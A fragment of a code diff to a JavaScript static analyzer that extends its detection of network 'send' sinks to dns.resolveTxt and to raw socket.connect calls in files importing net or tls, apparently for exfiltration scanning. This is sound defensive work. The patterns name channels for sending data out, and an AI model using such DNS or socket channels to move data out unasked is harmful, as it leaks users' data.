-          if (obj.name === 'dns' && ['resolve', 'lookup', 'resolve4', 'resolve6'].includes(prop.name)) {
+          if (obj.name === 'dns' && ['resolve', 'lookup', 'resolve4', 'resolve6', 'resolveTxt'].includes(prop.name)) {
             sinks.push({ type: 'network_send', name: `dns.${prop.name}`, line: node.loc?.start?.line });
           }
           // HTTP/HTTPS request/get as network sink
@@ -166,6 +169,10 @@ function analyzeFile(content, filePath, basePath) {
           if ((obj.name === 'net' || obj.name === 'tls') && ['connect', 'createConnection'].includes(prop.name)) {
             sinks.push({ type: 'network_send', name: `${obj.name}.${prop.name}`, line: node.loc?.start?.line });
           }
+          // Instance socket.connect(port, host) when file imports net/tls
+          if (hasRawSocketModule && prop.name === 'connect' && node.arguments.length >= 2) {
+            sinks.push({ type: 'network_send', name: 'socket.connect', line: node.loc?.start?.line });
+          }
         }
       }